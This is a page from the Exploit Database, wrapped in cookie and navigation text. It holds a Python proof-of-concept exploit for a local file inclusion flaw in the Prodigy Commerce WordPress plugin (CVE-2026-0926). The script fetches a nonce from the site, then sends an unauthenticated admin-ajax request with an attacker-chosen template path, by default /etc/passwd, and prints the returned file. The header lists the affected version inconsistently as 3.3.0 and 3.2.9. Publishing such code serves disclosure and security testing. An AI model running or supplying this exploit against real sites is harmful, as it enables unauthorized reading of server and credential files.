- What: Local File Inclusion vulnerability in Prodigy Commerce
- Impact: Potential for unauthorized file access
This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Prodigy Commerce 3.3.0 - Local File Inclusion EDB-ID: 52598 CVE: 2026-0926 EDB Verified: Author: DIAMORPHINE Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-05-29 Vulnerable App: # Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion # Date: 23-05-2026 # Exploit Author: Diamorphine # Vendor Homepage: https://prodigycommerce.com/ # Software Link: https://wordpress.org/plugins/prodigy-commerce/ # Version: 3.2.9 # Tested on: Debian # CVE : CVE-2026-0926 # Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely. import httpx import asyncio import re from urllib.parse import urljoin import argparse def get_nonce(base_url): with httpx.Client(verify=False) as client: r = client.get(url=base_url) match = re.search(r'var settings\s*=\s*{[^}]*"nonce":"([^"]+)"', r.text) if match: nonce = match.group(1) return nonce else: print("Nonce not found") async def main(base_url,file): async with httpx.AsyncClient(verify=False) as client: nonce = get_nonce(base_url) data = { "action": "prodigy-render-my-account-widget", "nonce": nonce, "parameters[template_name]": file, "parameters[default_path]": "/" } url = urljoin(base_url, '/wp-admin/admin-ajax.php') r = await client.post(url=url, data=data) raw = r.json() out = raw['data'] print(out['html']) parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit") parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd") parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local") args = parser.parse_args() asyncio.run(main(args.url, args.file)) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.